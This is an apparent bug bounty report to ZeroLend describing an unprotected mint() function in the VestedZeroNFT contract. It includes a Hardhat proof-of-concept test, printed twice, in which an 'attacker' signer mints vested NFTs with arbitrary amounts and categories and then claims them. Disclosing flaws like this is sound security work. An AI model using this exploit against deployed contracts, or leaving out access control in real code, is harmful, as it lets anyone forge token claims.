28875 - [SC - Medium] Unauthorized minting of vested NFTs

Submitted on Feb 29th 2024 at 16:43:28 UTC by @riptide for Boost | ZeroLend

Report ID: #28875

Report type: Smart Contract

Report severity: Medium

Target: https://github.com/zerolend/governance

Impacts:

Griefing (e.g. no profit motive for an attacker, but damage to the users or the protocol)

Description

Brief/Intro

VestedZeroNFT contract lacks a permissioned modifer for mint() on L63 which allows any user to mint an unlimited amount of VestedZeroNFTs to any address with falsified categories.

Vulnerability Details

Lack of permissioned modifier to a function explicitly specified as protected in the comments.

Impact Details

Low impact other than misrepresenting the VestCategory at will and corrupting any analytics when viewing the collection and stats of the vested NFTs (amounts, cliff times, linear, etc all can be arbitrarily set).

References

Add any relevant links to documentation or code

Proof of concept

import { expect } from "chai";
import { deployGovernance } from "./fixtures/governance";
import { loadFixture, time } from "@nomicfoundation/hardhat-network-helpers";
import { SignerWithAddress } from "@nomicfoundation/hardhat-ethers/signers";
import { VestedZeroNFT } from "../typechain-types";
import { e18 } from "./fixtures/utils";
const { ethers } = require("hardhat");

describe.only("VestedZeroNFT", () => {
  let ant: SignerWithAddress;
  let vest: VestedZeroNFT;
  let now: number;

  beforeEach(async () => {
    const deployment = await loadFixture(deployGovernance);
    ant = deployment.ant;
    vest = deployment.vestedZeroNFT;
    now = Math.floor(Date.now() / 1000);

  });

  describe("unprotected mint function", () => {

    it("anyone can mint an NFT with any vesting parameters", async function () {
      const [attacker] = await ethers.getSigners();
      await vest.connect(attacker).mint(
        ant.address,
        e18 * 15n, // 15 ZERO linear vesting
        e18 * 5n, // 5 ZERO upfront
        1, // linear duration
        0, // cliff duration - 500 seconds
        now + 1000, // unlock date
        false, // penalty -> false
        0
      );
      expect(await vest.balanceOf(ant)).to.equal(1);
      expect(await vest.ownerOf(1)).to.equal(ant.address);
      expect(await vest.tokenOfOwnerByIndex(ant.address, 0)).to.equal(1);

      await time.increaseTo(now + 1001);
      const res = await vest.claimable(1);
      console.log("unlock date: ", now + 1000);
      console.log(res);
      expect(res.upfront).to.equal(e18 * 5n);
      expect(res.pending).to.equal(e18 * 15n);

      expect(await vest.claim.staticCall(1)).to.eq(e18 * 20n);
      await vest.claim(1);
      expect(await vest.claimed(1)).to.equal(e18 * 20n);
      expect(await vest.unclaimed(1)).to.equal(0);
    });

    
    it("anyone can mint an NFT with zero value", async function () {
      const [attacker] = await ethers.getSigners();
      await vest.connect(attacker).mint(
        ant.address,
        0, // 15 ZERO linear vesting
        0, // 5 ZERO upfront
        1, // linear duration
        500, // cliff duration - 500 seconds
        now + 1000, // unlock date
        false, // penalty -> false
        0
      );

    });

    it("anyone can mint an NFT with incorrect categorization", async function () {
      const [attacker] = await ethers.getSigners();
      await vest.connect(attacker).mint(
        ant.address,
        e18 * 15n, // 15 ZERO linear vesting
        e18 * 5n, // 5 ZERO upfront
        1, // linear duration
        0, // cliff duration - 500 seconds
        now + 1000, // unlock date
        false, // penalty -> false
        1
      );
    });


  });
});

PreviousZeroLend Next28885 - [SC - Medium] Lack of check for Lockend in merge LockerToken ...

Last updated 1 year ago

Was this helpful?

import { expect } from "chai"; import { deployGovernance } from "./fixtures/governance"; import { loadFixture, time } from "@nomicfoundation/hardhat-network-helpers"; import { SignerWithAddress } from "@nomicfoundation/hardhat-ethers/signers"; import { VestedZeroNFT } from "../typechain-types"; import { e18 } from "./fixtures/utils"; const { ethers } = require("hardhat"); describe.only("VestedZeroNFT", () => { let ant: SignerWithAddress; let vest: VestedZeroNFT; let now: number; beforeEach(async () => { const deployment = await loadFixture(deployGovernance); ant = deployment.ant; vest = deployment.vestedZeroNFT; now = Math.floor(Date.now() / 1000); }); describe("unprotected mint function", () => { it("anyone can mint an NFT with any vesting parameters", async function () { const [attacker] = await ethers.getSigners(); await vest.connect(attacker).mint( ant.address, e18 * 15n, // 15 ZERO linear vesting e18 * 5n, // 5 ZERO upfront 1, // linear duration 0, // cliff duration - 500 seconds now + 1000, // unlock date false, // penalty -> false 0 ); expect(await vest.balanceOf(ant)).to.equal(1); expect(await vest.ownerOf(1)).to.equal(ant.address); expect(await vest.tokenOfOwnerByIndex(ant.address, 0)).to.equal(1); await time.increaseTo(now + 1001); const res = await vest.claimable(1); console.log("unlock date: ", now + 1000); console.log(res); expect(res.upfront).to.equal(e18 * 5n); expect(res.pending).to.equal(e18 * 15n); expect(await vest.claim.staticCall(1)).to.eq(e18 * 20n); await vest.claim(1); expect(await vest.claimed(1)).to.equal(e18 * 20n); expect(await vest.unclaimed(1)).to.equal(0); }); it("anyone can mint an NFT with zero value", async function () { const [attacker] = await ethers.getSigners(); await vest.connect(attacker).mint( ant.address, 0, // 15 ZERO linear vesting 0, // 5 ZERO upfront 1, // linear duration 500, // cliff duration - 500 seconds now + 1000, // unlock date false, // penalty -> false 0 ); }); it("anyone can mint an NFT with incorrect categorization", async function () { const [attacker] = await ethers.getSigners(); await vest.connect(attacker).mint( ant.address, e18 * 15n, // 15 ZERO linear vesting e18 * 5n, // 5 ZERO upfront 1, // linear duration 0, // cliff duration - 500 seconds now + 1000, // unlock date false, // penalty -> false 1 ); }); }); });

hashtagDescription

hashtagBrief/Intro

hashtagVulnerability Details

hashtagImpact Details

hashtagReferences

hashtagProof of concept